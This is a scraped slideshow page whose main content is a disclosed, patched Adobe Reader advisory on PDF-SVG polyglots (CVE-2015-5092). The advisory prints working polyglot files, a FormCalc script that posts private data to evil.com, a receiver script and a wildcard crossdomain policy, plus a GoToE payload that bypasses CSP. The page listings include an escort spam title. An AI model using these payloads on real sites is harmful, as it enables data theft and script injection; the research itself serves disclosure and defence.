Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Minded Security
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Minded Security
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 

More from Minded Security (12)

Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.
 
Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019Matteo Meucci - Security Summit 12th March 2019
Matteo Meucci - Security Summit 12th March 2019
 
Microservices Security: dos and don'ts
Microservices Security: dos and don'tsMicroservices Security: dos and don'ts
Microservices Security: dos and don'ts
 
Live hacking Demo
Live hacking DemoLive hacking Demo
Live hacking Demo
 
Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018Js deobfuscation with JStillery - bsides-roma 2018
Js deobfuscation with JStillery - bsides-roma 2018
 
Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017Matteo Meucci Isaca Venice - 2017
Matteo Meucci Isaca Venice - 2017
 
BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017BlueClosure Pitch - Cybertech Europe 2017
BlueClosure Pitch - Cybertech Europe 2017
 
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
Minded Security - Fabrizio Bugli - (3rd) party like nobody's watching...
 
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
 
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
Matteo Meucci Software Security in practice - Aiea torino - 30-10-2015
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
PHP Object Injection
PHP Object InjectionPHP Object Injection
PHP Object Injection
 

Recently uploaded

Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 

Recently uploaded (20)

Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 

PDF-based polyglots through SVG images

  • 1. PDF-based polyglots through SVG images Target product: Adobe Reader Researcher: Mauro Gentile
  • 2. PDF-SVG polyglots in Adobe Reader Page 1/11 Summary 1 PDF-BASED POLYGLOTS THROUGH SVG IMAGES...............................2 1.1.1 Description.............................................................................................................2 1.1.2 Exploitation scenario .............................................................................................4 1.1.3 Impact ....................................................................................................................7 1.1.4 Polyglots related to XSS and Content Security Policy............................................8 1.1.5 References ...........................................................................................................10
  • 3. PDF-SVG polyglots in Adobe Reader Page 2/11 1 PDF-based polyglots through SVG images The vulnerability described in this report was responsibly reported to Adobe on April 21, 2015. Adobe released a patch on July 14, 2015 (APSB15-15: https://helpx.adobe.com/security/products/reader/apsb15-15.html), and has assigned CVE- 2015-5092 to the specific security issue. 1.1.1 Description The “PDF Content Smuggling” concept was introduced by Magazinius, Rios and Sabelfeld in an academic paper entitled “Polyglots: Crossing Origins by Crossing Formats” [1, 2]; the technique is based on the idea to adopt PDF-based polyglots (i.e. files which are both PDF documents and images) to perform same-origin request forgery aiming towards exfiltrating private data in the context of a target domain [3, 4]. Adobe patched this issue by comparing the first bytes of the PDF document against a set of known file signatures: if a match is found, the parser will abort loading of the document. Obviously, such approach has some intrinsic weaknesses: 1. Blacklisting known file signatures could be bypassed if we are able to spot file formats, which are not blacklisted. 2. Identifying file formats, whose signature can appear beyond offset 0, would still lead to PDF-based polyglots. However, no widespread image format is allowed to start beyond offset 0 [5, 6] and signatures for popular formats are blacklisted. This implies that PDF-based polyglots are not possible anymore if the benign format is a common image, unless there exists a format with some degree of freedom with respect to the “signature bytes”. As a consequence of these considerations, we can introduce the PDF-SVG polyglots, since SVG format is quite tolerant with respect to the “signature bytes”1. Adobe took into consideration SVG images too, and made the following choices2 when addressing the content smuggling issue:  “<?xml” at offset 0 is blacklisted  “<svg” at offset 0 is blacklisted  “<!DOCTYPE” at offset 0 is not blacklisted 1 For the sake of clarity, it is not appropriate to talk about “signature bytes” for the SVG format. 2 Test results refer to Adobe Reader version 11.0.11; changes have been applied in version 11.0.12 in order to address the vulnerability herein described.
  • 4. PDF-SVG polyglots in Adobe Reader Page 3/11 Introducing whitespaces and/or new lines before “<?xml” or “<svg” does not bypass the patch; instead, putting any other character before these two blacklisted signatures leads to a successful bypass, but it makes the resulting SVG file not syntactically well-formed. Nevertheless, valid PDF-SVG polyglots, which will be correctly read both by Adobe Reader and by SVG images interpreters, can exist as we are reporting in the following cases. 1) Comment at offset 0 <!----> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 2) Dummy tag at offset 0 <i> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> </i> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 3) Tag "<?dummy" at offset 0 <?h ?> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream
  • 5. PDF-SVG polyglots in Adobe Reader Page 4/11 BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 4) <!DOCTYPE at offset 0 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 5) SVG in PDF comment <!--%PDF-1. 1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET %--><svg xmlns="http://www.w3.org/2000/svg" version="1.1"><circle r="100" fill="blue" /></svg><!-- endstream endobj trailer<</Root<</Pages 1 0 R>>>>--> 1.1.2 Exploitation scenario Let us assume that the web application ideally hosted on example.com allows users to upload SVG images; once the attacker manages to upload a malicious PDF-SVG polyglot on example.com and asks the victim to visit http://evil.com/test.html, he could steal its private information as well as anti-CSRF tokens. Data can be accessed by asking PDF files to trigger same-origin HTTP requests [7, 8, 9] through FormCalc APIs. For the sake of precision, note that if the target web application is allowing PDF files uploads, then such technique would become useless; uploading a genuine PDF file,
  • 6. PDF-SVG polyglots in Adobe Reader Page 5/11 instead of a polyglot, would lead to the same result, unless some filtering procedures are in place for such file format. http://example.com/files/user_uploaded.svg <!DOCTYPE svg> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> </svg> <!-- %PDF-1. 1 0 obj <<>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config><present><pdf><interactive>1</interactive></pdf></present></config> <template> <subform name="_"> <pageSet/> <field id="Hello World!"> <event activity="initialize"> <script contentType='application/x-formcalc'> var content = Get("http://example.com/privatedata.php"); Post("http://evil.com/receiver.php",content); </script> </event> </field> </subform> </template> </xdp:xdp> endstream endobj trailer << /Root << /AcroForm << /Fields [<< /T (0) /Kids [<< /Subtype /Widget /Rect [] /T () /FT /Btn >>] >>]
  • 7. PDF-SVG polyglots in Adobe Reader Page 6/11 /XFA 1 0 R >> /Pages <<>> >> >> --> http://example.com/privatedata.php <?php session_start(); if (isset($_SESSION['user'])) { echo "PRIVATEDATA..."; } else { echo "nothing"; } ?> http://evil.com/test.html <img src="http://example.com/files/user_uploaded.svg" /> <object data="http://example.com/files/user_uploaded.svg" type="application/pdf" width="350" height="200" /> http://evil.com/crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> http://evil.com/receiver.php <?php if ($_SERVER['REQUEST_METHOD'] === 'POST') { $data = file_get_contents('php://input')."n"; $ret = file_put_contents('/tmp/data.txt', $data, FILE_APPEND | LOCK_EX); }
  • 8. PDF-SVG polyglots in Adobe Reader Page 7/11 ?> Attack flow The attack flow is reported below. 1. The victim logs in http://example.com/ 2. The victim is asked to visit http://evil.com/test.html 3. The PDF polyglot steals victim’s private data and sends them to http://evil.com/receiver.php Testing environment The shown polyglots were successfully tested in the following environments: 1. Windows 7, Adobe Reader plug-in 11.0.11.18, on Mozilla Firefox 39.0, in which we set “Preview in Firefox with Adobe Reader” for the PDF file format. 2. Windows 7, Adobe Reader plug-in 11.0.11.18, on Opera 30.0, in which we disabled the “Chrome PDF viewer”. 3. Windows 7, Adobe Reader plug-in 11.0.11.18, on Google Chrome 44.0.2403.107, in which we disabled the “Chrome PDF viewer”, and enabled the Adobe Reader plug-in. Note that PDF polyglots do not work in Internet Explorer since it downloads them and opens a local copy. In addition, take into consideration that default installations of Firefox, Chrome and Opera do not use Adobe Reader for rendering PDF files, therefore potentially affected users are the ones who modified their browser settings in order to use Adobe Reader instead of the default built-in reader. 1.1.3 Impact Allowing users to upload SVG files can be considered as dangerous as making them upload HTML files aiming towards triggering XSS attacks; for all details refer to the research carried out by Heiderich [10, 11, 12]. By the way, modern web applications use to adopt filters against uploaded SVG files, in order to identify whether they contain tags and/or attributes, whose goal is to execute JavaScript. By considering the case of XSS(-SVG) filters, which are strict enough to block any bypass attempt, then the aforementioned polyglots would still make the target web application vulnerable to same-origin request forgery and content hijacking; this is due to the fact
  • 9. PDF-SVG polyglots in Adobe Reader Page 8/11 that the PDF content would be seen as a comment in the context of the SVG filtering procedure3. For further inspiration about polyglots and PDF related resources refer to [13, 14, 15, 16, 17, 18, 19]. 1.1.4 Polyglots related to XSS and Content Security Policy Although several research has been carried out in the last years, Inführ recently proposed an interesting case for triggering Cross-Site Scripting through PDF files [7, 20]. Basically, it was possible to execute JavaScript code in the context of a target domain by uploading malicious PDF files; the execution took place by abusing the GoToE function. By combining the PDF-based polyglots issue with the just mentioned XSS problem, we are able to craft a malicious SVG(-PDF) image which contains an HTML document, which embeds itself, making the execution of arbitrary JavaScript code take place. Consider the following PDF-based polyglot to better understand: <!DOCTYPE svg> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle r="100" fill="blue" /> <foreignObject> <body xmlns="http://www.w3.org/1999/xhtml"> <embed src="#" type="application/pdf"></embed> </body> </foreignObject> </svg> <!-- %PDF-1.1 1 0 obj << /Pages 2 0 R /OpenAction 4 0 R >> endobj 2 0 obj << /Type /Pages 3 Note that filters, discarding comments and CDATA sections, remove the PDF content from the resulting SVG image; in that case, it is obvious that PDF-SVG polyglots could not exist.
  • 10. PDF-SVG polyglots in Adobe Reader Page 9/11 /Kids [3 0 R] >> endobj 3 0 obj << /Type /Page /Parent 2 0 R >> endobj 4 0 obj << /Type /Action /S /GoToE /F (javascript:alert(document.domain)) >> endobj trailer << /Root 1 0 R >> --> The reported polyglot proves quite interesting, since it leads to a Content Security Policy bypass in Blink-based browsers4. By considering the case of a target web application using CSP as follows, then the assumption that JavaScript execution cannot take place becomes wrong, unless the victim is using a patched version5 of Adobe Reader. Content-Security-Policy: default-src 'self'; script-src 'none'; By visiting the SVG file reported above, document.domain is alerted. In these conditions, the combination of the polyglots and the XSS bug becomes quite useful for attacking web applications allowing SVG files uploads (, but prohibiting genuine PDFs uploads, ) and relying only on CSP for protecting against XSS. Although this approach raises the overall vulnerability impact, it is clear that allowing foreignObjects tags in uploaded SVG files is sufficient for being vulnerable to stored XSS; 4 Tested in Google Chrome 44.0.2403.107 and Opera 30.0, with Adobe Reader plug-in 11.0.11.18 enabled in place of Chrome PDF viewer. 5 Both XSS through GoToE and the SVG related content smuggling issue have been patched in Adobe Reader 11.0.12.
  • 11. PDF-SVG polyglots in Adobe Reader Page 10/11 therefore, the presented attack becomes reasonable if XSS protection is achieved through CSP only. For the sake of completeness, the relation among SVG images and CSP was exhaustively described by deGraaf [21]. The adoption of polyglots to bypass CSP was previously discussed by Heiderich in a scenario in which HTML Imports were abused to load a malicious same-origin GIF image [22, 23]. Defining default-src to ‘self’ implies giving wide confidence to the same-origin, thus, having a chance to upload polyglots on this origin would make CSP protection potentially useless, unless the application is restricting any specific policy directive. In a more general perspective, it is clear that the problem involves external trusted domains too; for instance, embedding scripts from a domain accepting SWF files uploads would still make the CSP protection useless [24]. Eventually, curious readers may be interested in some other CSP bypass techniques by Kouzemtchenko [25]. Notes: 1. The minimal PDF file was taken from: https://code.google.com/p/corkami/wiki/PDFTricks#Minimalists_PDF 2. The PDF template file, using FormCalc, was taken from the Cross-Site Content Hijacking proof of concepts by Soroush Dalili of NCC Group: https://github.com/nccgroup/CrossSiteContentHijacking/blob/master/ContentHijacking/o bjects/xfa-manual-ContentHijacking.pdf 1.1.5 References [1] "Polyglots: Crossing Origins by Crossing Formats", Jonas Magazinius, Billy K. Rios, Andrei Sabelfeld - http://www.cse.chalmers.se/~andrei/ccs13.pdf [2] "Content Smuggling", Billy K. Rios - http://xs-sniper.com/blog/2012/10/11/content-smuggling/ [3] "Crossing Origins by Crossing Formats", Jonas Magazinius - http://www.slideshare.net/internot/crossing-origins-by-crossing-formats [4] "Crossing Origins by Crossing Formats", Jonas Magazinius - https://www.owasp.org/images/8/85/Crossing.Origins.by.Crossing.Formats-Jonas.Magazinius-OWASP- 131010.pptx [5] "Corkamix", Ange Albertini - https://code.google.com/p/corkami/wiki/mix?show=content [6] "Messing with binary formats", Ange Albertini - http://www.slideshare.net/ange4771/messing-with- binary-formats
  • 12. PDF-SVG polyglots in Adobe Reader Page 11/11 [7] "Multiple PDF Vulnerabilities - Text and Pictures on Steroids", Alex Inführ - http://insert- script.blogspot.co.at/2014/12/multiple-pdf-vulnerabilites-text-and.html [8] "Cross-Site Content Hijacking (XSCH) PoC", Soroush Dalili - https://github.com/nccgroup/CrossSiteContentHijacking [9] "SDRF vulns in webapps and browsers", Vladimir Vorontsov - http://seclists.org/fulldisclosure/2010/Aug/236 [10] "HTML5 Security Cheatsheet - Vectors embedded in SVG files", Mario Heiderich - http://html5sec.org/#svg [11] "The Image that called me", Mario Heiderich - http://www.slideshare.net/x00mario/the-image-that- called-me [12] "Crouching Tiger - Hidden Payload: Security Risks of Scalable Vectors Graphics", Mario Heiderich, Tilman Frosch, Meiko Jensen, Thorsten Holz - http://www.hgi.ruhr-uni- bochum.de/media/hgi/veroeffentlichungen/2011/10/19/svgSecurity-ccs11.pdf [13] "Hello, squirrel fans!", Michal Zalewski - http://lcamtuf.coredump.cx/squirrel/ [14] "Deadly Pixels", Saumil Shah - http://www.slideshare.net/saumilshah/deadly-pixels-nsc-2013 [15] "Valid pictures with useable JavaScript", Ange Albertini - https://code.google.com/p/corkami/downloads/detail?name=jspics.zip&can=2&q= [16] "OMG-WTF-PDF", Julia Wolf - http://www.troopers.de/wp- content/uploads/2011/04/TR11_Wolf_OMG_PDF.pdf [17] "Advanced PDF Tricks", Ange Albertini - https://speakerdeck.com/ange/advanced-pdf-tricks [18] "Funky File Formats", Ange Albertini - https://speakerdeck.com/ange/funky-file-formats-31c3 [19] "Polyglot payloads in practice", Mathias Karlsson - http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra [20] "PDF - Mess with the web", Alex Inführ - http://insert-script.blogspot.co.at/2015/05/pdf-mess-with- web.html [21] "SVG: Exploiting Browsers Without Image Parsing Bugs", Rennie deGraaf - https://www.blackhat.com/docs/us-14/materials/us-14-DeGraaf-SVG-Exploiting-Browsers-Without- Image-Parsing-Bugs.pdf [22] "CSP Bypass in Chrome Canary + AngularJS", Mario Heiderich - https://html5sec.org/cspbypass/ [23] "JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks", Mario Heiderich - http://www.slideshare.net/x00mario/jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating- frameworks [24] "Building an XSS polyglot through SWF and CSP", Frans Rosén - http://labs.detectify.com/post/120088174539/building-an-xss-polyglot-through-swf-and-csp [25] "Bypassing Content Security Policy", Alex Kouzemtchenko - https://www.youtube.com/watch?v=LA9S9I4Co00